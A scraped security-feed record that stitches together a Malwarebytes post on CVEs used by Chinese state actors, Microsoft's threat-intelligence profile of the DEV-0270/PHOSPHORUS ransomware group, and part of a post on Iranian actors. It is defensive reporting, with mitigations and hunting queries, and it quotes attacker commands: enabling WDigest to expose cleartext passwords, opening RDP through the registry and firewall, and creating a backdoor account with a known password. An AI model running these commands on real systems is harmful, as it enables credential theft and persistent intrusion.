"2023-08-07T18:30:00", "id": "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "href": "https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity 
advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. 
Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need to be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vulnerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. 
The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and 
[CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. 
[CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * Apply patches as they come, prioritizing the most critical flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-09-07T21:07:14", "description": "Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of [Iranian actor PHOSPHORUS](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>). Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran. However, judging from their geographic and sectoral targeting, which often lacked a strategic value for the regime, we assess with low confidence that some of DEV-0270\u2019s ransomware attacks are a form of moonlighting for personal or company-specific revenue generation. This blog profiles the tactics and techniques behind the DEV-0270/PHOSPHORUS ransomware campaigns. 
We hope this analysis, which Microsoft is using to protect customers from related attacks, further exposes and disrupts the expansion of DEV-0270\u2019s operations.\n\nDEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBINs) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.\n\nIn some instances where encryption was successful, the time to ransom (TTR) between initial access and the ransom note was around two days. The group has been observed demanding USD 8,000 for decryption keys. In addition, the actor has been observed pursuing other avenues to generate income through their operations. In one attack, a victim organization refused to pay the ransom, so the actor opted to post the stolen data from the organization for sale packaged in an SQL database dump.\n\nUsing these observations, this blog details the group\u2019s tactics and techniques across its end-to-end attack chain to help defenders identify, investigate, and mitigate attacks. We also provide extensive hunting queries designed to surface stealthy attacks. This blog also includes protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\nFigure 1. Typical DEV-0270 attack chain\n\n## Who is DEV-0270?\n\nMicrosoft assesses that DEV-0270 is operated by a company that functions under two public aliases: Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir). We have observed numerous infrastructure overlaps between DEV-0270 and Secnerd/Lifeweb. 
These organizations are also linked to Najee Technology Hooshmand (\u0646\u0627\u062c\u06cc \u062a\u06a9\u0646\u0648\u0644\u0648\u0698\u06cc \u0647\u0648\u0634\u0645\u0646\u062f), located in Karaj, Iran.\n\nThe group is typically opportunistic in its targeting: the actor scans the internet to find vulnerable servers and devices, making organizations with vulnerable and discoverable servers and devices susceptible to these attacks.\n\nAs with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\n## Observed actor activity\n\n### Initial access\n\nIn many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon\u2014this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes. While there have been indications that DEV-0270 attempted to exploit [Log4j 2 vulnerabilities](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>), Microsoft has not observed this activity used against customers to deploy ransomware.\n\n### Discovery\n\nUpon gaining access to an organization, DEV-0270 performs a series of discovery commands to learn more about the environment. 
The command [_wmic_](<https://docs.microsoft.com/windows/win32/wmisdk/wmic>)_ computersystem get domain_ obtains the target\u2019s domain name. The _whoami_ command displays user information and the _net user_ command is used to add or modify user accounts. For more information on the accounts created and common password phrases DEV-0270 used, refer to the Advanced Hunting section.\n\n * wmic computersystem get domain\n * whoami\n * net user\n\nOn the compromised Exchange server, the actor used the following command to understand the target environment.\n \n \n Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders\n\nFor discovery of domain controllers, the actor used the following PowerShell and WMI command.\n\n\n\n### Credential access\n\nDEV-0270 often opts for a particular method using a LOLBin to conduct their credential theft, as this removes the need to drop common credential theft tools more likely to be detected and blocked by antivirus and endpoint detection and response (EDR) solutions. This process starts by enabling WDigest in the registry, which results in passwords stored in cleartext on the device and saves the actor time by not having to crack a password hash.\n \n \n \"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n\nThe actor then uses _rundll32.exe_ and _comsvcs.dll_ with its built-in MiniDump function to dump passwords from LSASS into a dump file. The command to accomplish this often specifies the output to save the passwords from LSASS. 
The file name is also reversed to evade detections (_ssasl.dmp_):\n\n\n\n### Persistence\n\nTo maintain access in a compromised network, the DEV-0270 actor adds or creates a new user account, frequently named _DefaultAccount_ with a password of _P@ssw0rd1234_, to the device using the command _net user /add_. The _DefaultAccount_ account is typically a pre-existing account set up but not enabled on most Windows systems.\n\nThe attacker then modifies the registry to allow remote desktop (RDP) connections for the device, adds a rule in the firewall using _netsh.exe_ to allow RDP connections, and adds the user to the remote desktop users group:\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v TSEnabled /t REG_DWORD /d 1 /f\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD\n \n \n \"netsh\" advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\n\nScheduled tasks are one of the recurrent methods used by DEV-0270 in their attacks to maintain access to a device. Generally, the tasks load via an XML file and are configured to run on boot with the least privilege to launch a .bat via the command prompt. The batch file results in a download of a renamed _dllhost.exe_, a reverse proxy, for maintaining control of the device even if the organization removes the file from the device.\n\nFigure 2. Scheduled task used in DEV-0270 attacks\n\n### Privilege escalation\n\nDEV-0270 can usually obtain initial access with administrator or system-level privileges by injecting their web shell into a privileged process on a vulnerable web server. 
When the group uses Impacket\u2019s WMIExec to move to other systems on the network laterally, they are typically already using a privileged account to run remote commands. DEV-0270 also commonly dumps LSASS, as mentioned in the credential access section, to obtain local system credentials and masquerade as other local accounts which might have extended privileges.\n\nAnother form of privilege escalation used by DEV-0270 involves the creation or activation of a user account to provide it with administrator privileges. DEV-0270 uses _powershell.exe_ and _net.exe_ commands to create or enable this account and add it to the administrators\u2019 group for higher privileges.\n\n### Defense evasion\n\nDEV-0270 uses a handful of defensive evasion techniques to avoid detection. The threat actors typically turn off Microsoft Defender Antivirus real-time protection to prevent Microsoft Defender Antivirus from blocking the execution of their custom binaries. The threat group creates or activates the _DefaultAccount_ account to add it to the Administrators and Remote Desktop Users groups. The modification of the _DefaultAccount_ provides the threat actor group with a legitimate pre-existing account with nonstandard, higher privileges. DEV-0270 also uses _powershell.exe_ to load their custom root certificate to the local certificate database. This custom certificate is spoofed to appear as a legitimate Microsoft-signed certificate. However, Windows flags the spoofed certificate as invalid due to the unverified certificate signing chain. This certificate allows the group to encrypt their malicious communications to blend in with other legitimate traffic on the network.\n\nAdditionally, DEV-0270 heavily uses native LOLBins to effectively avoid detection. The threat group commonly uses native WMI, net, CMD, and PowerShell commands and registry configurations to maintain stealth and operational security. 
They also install and masquerade their custom binaries as legitimate processes to hide their presence. Some of the legitimate processes they masquerade their tools as include: _dllhost.exe_, _task_update.exe_, _user.exe_, and _CacheTask_. Using .bat files and _powershell.exe_, DEV-0270 might terminate existing legitimate processes, run their binary with the same process name, and then configure scheduled tasks to ensure the persistence of their custom binaries.\n\n### Lateral movement\n\nDEV-0270 has been seen creating _defaultaccount_ and adding that account to the Remote Desktop Users group. The group uses the RDP connection to move laterally, copy tools to the target device, and perform encryption.\n\nAlong with RDP, [Impacket](<https://github.com/SecureAuthCorp/impacket/>)\u2019s WMIExec is a known toolkit used by the group for lateral movement. In multiple compromises, this was the main method observed for them to pivot to additional devices in the organization, execute commands to find additional high-value targets, and dump credentials for escalating privileges.\n\nAn example of a command using Impacket\u2019s WMIExec from a remote device:\n \n \n cmd.exe /Q /c quser 1> \\\\127.0.0.1\\ADMIN$\\__1657130354.2207212 2>&1\n\n### Impact\n\nDEV-0270 has been seen using _setup.bat_ commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses _DiskCryptor_, an open-source full disk encryption system for Windows that allows for the encryption of a device's entire hard drive. The group drops _DiskCryptor_ from an RDP session and when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.\n\nThe following are DEV-0270\u2019s PowerShell commands using BitLocker:\n\n\n\nMicrosoft will continue to monitor DEV-0270 and PHOSPHORUS activity and implement protections for our customers. 
The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended mitigation steps\n\nThe techniques used by DEV-0270 can be mitigated through the following actions:\n\n * Apply the [corresponding security updates for Exchange Server](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>), including applicable fixes for [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>). While it is important to prioritize patching of internet-facing Exchange servers to mitigate risk in an ordered manner, unpatched internal Exchange Server instances should also be addressed as soon as possible.\n * For Exchange Server instances in Mainstream Support, critical product updates are released for the most recently released Cumulative Updates (CU) and for the previous CU. For Exchange Server instances in Extended Support, critical product updates are released for the most recently released CU only.\n * If you don't have a supported CU, Microsoft is producing an additional series of security updates (SUs) that can be applied to some older and unsupported CUs to help customers more quickly protect their environment. For information on these updates, see March 2021 Exchange Server Security Updates for older Cumulative Updates of Exchange Server.\n * Installing the updates is the only complete mitigation for these vulnerabilities and has no impact on functionality. 
If the threat actor has exploited these vulnerabilities to install malware, installing the updates _does not_ remove implanted malware or evict the actor.\n * Use [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among devices whenever possible. This limits lateral movement and other attack activities.\n * Check your perimeter firewall and proxy to restrict or prevent network appliances like Fortinet SSL VPN devices from making arbitrary connections to the internet to browse or download files.\n * Enforce strong local administrator passwords. Use tools like [LAPS](<https://docs.microsoft.com/previous-versions/mt227395\\(v=msdn.10\\)?redirectedfrom=MSDN>).\n * Ensure that [Microsoft Defender Antivirus](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) is up to date and that real-time behavior monitoring is enabled.\n * Keep backups so you can recover data affected by destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.\n * Turn on the following [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat:\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n * Block process creations originating from PsExec and WMI commands\n * Block persistence through WMI event subscription. 
 * Ensure that Microsoft Defender for Endpoint is up to date and that real-time behavior monitoring is enabled.

## Detection details

### Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

 * Malware associated with DEV-0270 activity group detected

The following additional alerts may also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

 * A script with suspicious content was observed
 * A suspicious file was observed
 * Anomalous behavior by a common executable
 * Lazagne post-exploitation tool
 * Local Emails Collected
 * Mimikatz credential theft tool
 * 'Mimilove' high-severity malware was prevented
 * New group added suspiciously
 * Ongoing hands-on-keyboard attack via Impacket toolkit
 * Possible Antimalware Scan Interface (AMSI) tampering
 * Possible attempt to discover groups and permissions
 * Possible exploitation of Exchange Server vulnerabilities
 * Possible exploitation of ProxyShell vulnerabilities
 * Possible web shell installation
 * Process memory dump
 * Suspicious Account Discovery: Email Account
 * Suspicious behavior by cmd.exe was observed
 * Suspicious behavior by svchost.exe was observed
 * Suspicious behavior by Web server process
 * Suspicious Create Account
 * Suspicious file dropped
 * Suspicious file dropped by Exchange Server process
 * Suspicious Modify Registry
 * Suspicious Permission Groups Discovery
 * Suspicious PowerShell command line
 * Suspicious PowerShell download or encoded command execution
 * Suspicious Process Discovery
 * Suspicious process executed PowerShell command
 * Suspicious process launched using dllhost.exe
 * Suspicious 'PShellCobStager' behavior was blocked
 * Suspicious Scheduled Task Process Launched
 * Suspicious sequence of exploration activities
 * Suspicious 'SuspExchgSession' behavior was blocked
 * Suspicious System Network Configuration Discovery
 * Suspicious System Owner/User Discovery
 * Suspicious Task Scheduler activity
 * Suspicious User Account Discovery
 * Suspicious user password change
 * Suspicious w3wp.exe activity in Exchange
 * System file masquerade
 * Tampering with the Microsoft Defender for Endpoint sensor
 * Unusual sequence of failed logons
 * WDigest configuration change

## Hunting queries

### Microsoft Sentinel

Microsoft Sentinel customers can use the following queries to look for the related malicious activity in their environments.

**DEV-0270 registry IOC**

This query identifies registry modifications made by the DEV-0270 actor to disable security features and to add ransom notes:

 * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270RegistryIOCSep2022.yaml>

**DEV-0270 malicious PowerShell usage**

DEV-0270 heavily uses PowerShell to achieve their objectives at various stages of their attack. This query locates PowerShell activity tied to the actor:

 * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270PowershellSep2022.yaml>

**DEV-0270 WMIC discovery**

This query identifies _dllhost.exe_ using WMIC to discover additional hosts and associated domains in the environment:

 * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270WMICDiscoverySep2022.yaml>

**DEV-0270 new user creation**

This query tries to detect the creation of a new user using a known DEV-0270 username/password schema:

 * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270NewUserSep2022.yaml>

### Microsoft 365 Defender

To locate possible actor activity, run the following queries.

**Disable services via registry**

Search for processes modifying the registry to disable security features.
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Disabling%20Services%20via%20Registry.yaml>)

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all(@'"reg"', 'add', @'"HKLM\SOFTWARE\Policies\', '/v', '/t', 'REG_DWORD', '/d', '/f')
    and InitiatingProcessCommandLine has_any('DisableRealtimeMonitoring', 'UseTPMKey', 'UseTPMKeyPIN', 'UseAdvancedStartup', 'EnableBDEWithNoTPM', 'RecoveryKeyMessageSource')
```

**Modifying the registry to add a ransom message notification**

Identify registry modifications that are indicative of a ransom note tied to DEV-0270. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Modifying%20the%20registry%20to%20add%20a%20ransom%20message%20notification.yaml>)

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all('"reg"', 'add', @'"HKLM\SOFTWARE\Policies\', '/v', '/t', 'REG_DWORD', '/d', '/f', 'RecoveryKeyMessage', 'Your drives are Encrypted!', '@')
```

**DLLHost.exe file creation via PowerShell**

Identify a masqueraded _DLLHost.exe_ file created by PowerShell.
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20file%20creation%20via%20PowerShell.yaml>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'powershell.exe'
| where InitiatingProcessCommandLine has_all('$file=', 'dllhost.exe', 'Invoke-WebRequest', '-OutFile')
```

**Add malicious user to Admins and RDP users group via PowerShell**

Look for a user being added to the Administrators and Remote Desktop Users groups via PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Add%20malicious%20user%20to%20Admins%20and%20RDP%20users%20group%20via%20PowerShell.yaml>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'powershell.exe'
| where InitiatingProcessCommandLine has_all('$admins=', 'System.Security.Principal.SecurityIdentifier', 'Translate', '-split', 'localgroup', '/add', '$rdp=')
```

**Email data exfiltration via PowerShell**

Identify email exfiltration conducted by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml>)

```kusto
DeviceProcessEvents
| where FileName =~ 'powershell.exe'
| where ProcessCommandLine has_all('Add-PSSnapin', 'Get-Recipient', '-ExpandProperty', 'EmailAddresses', 'SmtpAddress', '-hidetableheaders')
```

**Create new user with known DEV-0270 username/password**

Search for the creation of a new user using a known DEV-0270 username/password schema.
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Create%20new%20user%20with%20known%20DEV-0270%20username%20and%20password.yaml>)

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all('net user', '/add')
| parse InitiatingProcessCommandLine with * "user " username " "*
| extend password = extract(@"\buser\s+[^\s]+\s+([^\s]+)", 1, InitiatingProcessCommandLine)
| where username in('DefaultAccount') or password in('P@ssw0rd1234', '_AS_@1394')
```

**PowerShell adding exclusion path for Microsoft Defender of ProgramData**

Identify PowerShell adding the ProgramData directory as a Microsoft Defender exclusion path so that Defender does not monitor it. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/PowerShell%20adding%20exclusion%20path%20for%20Microsoft%20Defender%20of%20ProgramData.yaml>)

```kusto
DeviceProcessEvents
| where FileName =~ "powershell.exe" and ProcessCommandLine has_all("try", "Add-MpPreference", "-ExclusionPath", "ProgramData", "catch")
```

**DLLHost.exe WMIC domain discovery**

Identify dllhost.exe using WMIC to discover additional hosts and the associated domain.
[GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20WMIC%20domain%20discovery.yaml>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "dllhost.exe" and InitiatingProcessCommandLine == "dllhost.exe"
| where ProcessCommandLine has "wmic computersystem get domain"
```

The post [Profiling DEV-0270: PHOSPHORUS’ ransomware operations](<https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

_Record metadata: published 2022-09-07; feed id MMPC:1E3441B57C08BC18202B9FE758C2CA71; related CVEs: CVE-2018-13379, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-44228; CVSS v3.1 base score 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H); CVSS v2 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)._

---

Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled “_The Iranian evolution: Observed changes in Iranian malicious network operations_”. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC’s ongoing efforts to track these actors and protect customers from the related threats.

MSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.

As with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity.
Once it meets the criteria, a DEV is converted to a named actor.

Three notable trends in Iranian nation-state operators have emerged:

 * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.
 * They are more patient and persistent while engaging with their targets.
 * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.

## Ransomware

Since September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.

_Figure 1: Timeline of ransomware attacks by Iranian threat actors_

In one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.

### Scan

In the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year.
